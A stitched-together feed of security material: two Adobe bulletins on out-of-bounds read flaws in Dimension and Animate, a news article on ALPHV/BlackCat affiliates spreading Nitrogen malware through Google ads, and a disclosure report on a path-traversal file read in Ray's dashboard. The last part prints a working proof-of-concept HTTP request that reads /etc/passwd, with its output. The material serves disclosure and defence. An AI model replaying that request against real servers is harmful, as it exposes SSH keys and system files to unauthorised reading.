Adobe Dimension versions 3.4.9 (and earlier) is affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Security updates available for Dimension | APSB23-62

Bulletin ID

Date Published

Priority

APSB23-62

November 14, 2023

3

**Summary**

Adobe has released an update for Adobe Dimension. This update addresses an important vulnerability in Adobe Dimension.  Successful exploitation could lead to memory leak in the context of the current user.      

**Affected Versions**

**Product**

**Version**

**Platform**

Adobe Dimension  

3.4.9 and earlier versions   

Windows and macOS   

**Solution**

Adobe categorizes these updates with the following priority ratings and recommends users update their installation to the newest version via the Creative Cloud desktop app's update mechanism.  For more information, please reference this help page.     

Product

Version

Platform

Priority

Availability

Adobe Dimension  

3.4.10  

Windows and macOS   

3

Download Center       

For managed environments, IT administrators can use the Admin Console to deploy Creative Cloud applications to end users. Refer to this help page for more information.  

**Vulnerability Details**

Vulnerability Category

Vulnerability Impact

Severity

**CVSS base score**   

CVSS vector  

CVE number(s)  

Out-of-bounds Read (CWE-125)  

Memory leak

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2023-44326  

**Acknowledgments:**

Adobe would like to thank the following researchers for reporting these issues and working with Adobe to help protect our customers:

*   Mat Powell of Trend Micro Zero Day Initiative - CVE-2023-44326

NOTE: Adobe has a private, invite-only, bug bounty program with HackerOne. If you are interested in working with Adobe as an external security researcher, please fill out this form for next steps.

For more information, visit https://helpx.adobe.com/security.html, or email PSIRT@adobe.com

CVE-2023-44326: Adobe Security Bulletin

Adobe Animate versions 23.0.2 (and earlier) is affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Security updates available for Adobe Animate | APSB23-61

Bulletin ID

Date Published

Priority

ASPB23-61

November 14, 2023   

3

**Summary**

Adobe has released an update for Adobe Animate. This update resolves an important vulnerability.  Successful exploitation could lead to memory leak in the context of the current user.        

**Affected Versions**

**Product**

**Version**

**Platform**

Adobe Animate 2023  

23.0.2 and earlier versions  

Windows and macOS  

**Solution**

Adobe categorizes this update with the following  priority rating and recommends users update their installation to the newest version via the Creative Cloud desktop app's update mechanism.  For more information, please reference this help page.

Product

Version

Platform

Priority

Availability

Adobe Animate  2023     

23.0.3  

Windows and macOS

3

Download Center       

Adobe Animate  2023     

24.0

Windows and macOS  

3

Download Center       

For managed environments, IT administrators can use the Admin Console to deploy Creative Cloud applications to end users. Refer to this help page for more information.  

**Vulnerability Details**

Vulnerability Category

Vulnerability Impact

Severity

**CVSS base score**   

**CVSS vector**  

CVE Numbers

Out-of-bounds Read (CWE-125)  

Memory leak

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2023-44325  

**Acknowledgments**

Adobe would like to thank the following for reporting the relevant issues and for working with Adobe to help protect our customers:

*   Mat Powell of Trend Micro Zero Day Initiative  - CVE-2023-44325  
    

NOTE: Adobe has a private, invite-only, bug bounty program with HackerOne. If you are interested in working with Adobe as an external security researcher, please fill out this form for next steps.  

For more information, visit https://helpx.adobe.com/security.html, or email PSIRT@adobe.com.

CVE-2023-44325: Adobe Security Bulletin

By Deeba Ahmed
Yet another day, another instance of a Google service being exploited for spreading malware infections.
This is a post from HackRead.com Read the original post: ALPHV (BlackCat) Ransomware Gang Uses Google Ads for Targeted Victims

According to eSentire, the ALPHV ransomware gang is employing the Nitrogen malware in the ongoing attacks.

Cybersecurity experts at eSentire, a leading global cybersecurity solutions provider, have published details of an ongoing attack campaign from Russian-speaking affiliates of the notorious **ALPHV (aka BlackCat)** ransomware gang.

According to eSentire’s Threat Response Unit (TRU) researchers, key targets in this campaign are public entities and corporations in the Americas and Europe. Over the last three weeks, these affiliates have breached a manufacturer, a law firm, and a warehouse provider within eSentire’s customer network, apart from other firms. However, eSentire’s security research team thwarted and neutralized these attacks.

Researchers noted that ALPHV/BlackCat threat actors gain initial access to their target’s IT networks through three methods. These include exploiting stolen or compromised login credentials to gain unauthorized access, exploiting vulnerabilities in remote management/monitoring tools to access IT systems, and browser-based attacks in which users are tricked into visiting malicious websites that deliver malware or malicious links in emails or social media posts.

Furthermore, they observed that BlackCat affiliates have expanded their attack tactics substantially to include malvertising. In this campaign, the attackers place **deceptive Google ads** promoting popular software like Advanced IP Scanner, WinSCP, Slack, or Cisco AnyConnect to trick business professionals into visiting certain websites.

In reality, these attacker-controlled websites deliver Nitrogen malware under the guise of authentic software. They lure users by placing malicious ads at the top of search results for keywords relevant to businesses, for instance, ‘ **cloud backup solutions**.’

They can also use the name of a fictional company to lure their targets into clicking on the ads. These cyberattacks seem to be part of a larger campaign involving malicious ads for WinSCP placed on both Google and Bing search results by ALPHV/BlackCat affiliates.

“The malvertising attacks they shut down in the past three weeks on behalf of the law firm and manufacturer are a continuation of a June 2023 campaign, where an affiliate of the ALPHV/BlackCat Ransomware gang was observed using malicious ads to distribute the Nitrogen malware, which led to the ALPHV/BlackCat ransomware” eSentire’s **blog post** revealed. 

Nitrogen is an initial-access malware **discovered** in June 2023. It uses obfuscated Python libraries and DLL sideloading to evade detection and hide its attack path after infection.

After getting installed, it lets attackers gain a foothold in the targeted entity’s IT environment. Attackers can then infiltrate deeper and launch malware of their choice. In the ongoing campaign, victims are typically infected with ALPHV/BlackCat ransomware, eSentire TRU’s senior threat intelligence researcher Keegan Keplinger noted.

For your information, the ALPHV/BlackCat ransomware gang is known for its $100 million **MGM Resorts breach**. Its attack tactics have evolved from experienced ransomware operators such as the Colonial Pipeline attack fame **DarkSide**, REvil, and BlackMatter. Some of its prominent affiliates include Scatted Spider, FIN7, and UNC2565. 

The BlackCat/ALPHV ransomware presents a significant threat to businesses and unsuspecting users. The severity is underscored by the FBI’s release of Indicators of Compromise (IoC) **last year** (PDF).

Considering that ransomware operators are now exploiting **social media and Google Ads** to reach a wider audience, business owners should remain cautious of unexpected ads or too-good-to-be-true offers.

Always verify the legitimacy of the company offering the ad before clicking on it. Never download software from unknown/unverified sources, and use a reputable anti-malware program.

****_RELATED ARTICLES_****

1.  **Hackers use Google Ads to steal $50 million of Bitcoin**
2.  **Google Ads Malware Wipes NFT Influencer’s Crypto Wallet**
3.  **Malicious Ads Infiltrate Bing AI Chatbot in Malvertising Attack**
4.  **Fake Brave browser website dropped malware, thanks to Google Ads**
5.  **Ad-blocker Chrome extension AllBlock injected ads in Google searches**

ALPHV (BlackCat) Ransomware Gang Uses Google Ads for Targeted Victims

LFI in Ray's /static/ directory allows attackers to read any file on the server without authentication.

**Description**

Local file include allows remote attackers to make an unauthenticated API call and read any file on the system, such as SSH keys.

**Proof of Concept**

    GET /static/js/../../../../../../../../../../../../../../etc/passwd HTTP/1.1
    Host: localhost:8265
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Referer: http://localhost:8265/
    Sec-Fetch-Dest: script
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Site: same-origin
    
    HTTP/1.1 200 OK
    Content-Type: application/octet-stream
    Etag: "174880dae894b157-2020"
    Last-Modified: Thu, 02 Mar 2023 04:48:59 GMT
    Content-Length: 8224
    Accept-Ranges: bytes
    Date: Thu, 24 Aug 2023 23:01:58 GMT
    Server: Python/3.8 aiohttp/3.8.5
    Connection: close
    
    ##
    # User Database
    # 
    # Note that this file is consulted directly only when the system is running
    # in single-user mode.  At other times this information is provided by
    # Open Directory.
    #
    # See the opendirectoryd(8) man page for additional information about
    # Open Directory.
    ##
    nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
    root:*:0:0:System Administrator:/var/root:/bin/sh
    daemon:*:1:1:System Services:/var/root:/usr/bin/false
    fakeuser:*:99:99:Fake User:/Users/danmcinerney/fakeuser:/bin/sh
    _uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico
    _taskgated:*:13:13:Task Gate Daemon:/var/empty:/usr/bin/false
    [...]
    

**Impact**

Allows attackers to read any file on the server depending on the permissions Ray was run with.

**Occurrences**

Tag

#mac